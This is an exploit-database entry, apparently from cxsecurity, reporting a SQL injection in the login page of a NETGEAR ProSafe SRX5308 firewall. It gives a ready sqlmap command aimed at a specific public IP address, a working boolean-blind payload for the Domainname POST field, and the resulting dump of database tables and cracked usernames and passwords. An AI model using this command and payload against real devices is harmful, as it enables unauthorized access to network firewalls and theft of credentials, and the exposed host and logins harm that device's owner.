NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308 | SQL Injection Vulnerability

2021.12.17
tr 0x01369 (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308 | SQL Injection Vulnerability # Author: Чингис хаан # Tested On: Kali Linux # sqlmap -u "https://95.128.69.5/scgi-bin/platform.cgi" --form --current-db --dbs --banner --batch --------------------------------------------------------------------------------------------------- NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308 NETGEAR ProSafe™ - NETGEAR Configuration Manager Login https://95.128.69.5/scgi-bin/platform.cgi --- Parameter: USERDBDomains.Domainname (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: thispage=index.htm&USERDBUsers.UserName=oTcy&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain' AND 2477=2477 AND 'GOgI'='GOgI&button.login.USERDBUsers.router_status=Login&Login.userAgent=SmwH Vector: AND [INFERENCE] --- the back-end DBMS: SQLite the back-end DBMS is SQLite current user is DBA: True available databases [1]: [+] SQLite_masterdb Database: SQLite_masterdb [4 tables] +----------+ | system | | logging | | services | | zones | +----------+ passwd and shadow encryption cracked +---------------------+ | username | password | +----------+----------+ | showid | password | +----------+----------+ | guest | password | +----------+----------+

References:

0x01369


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top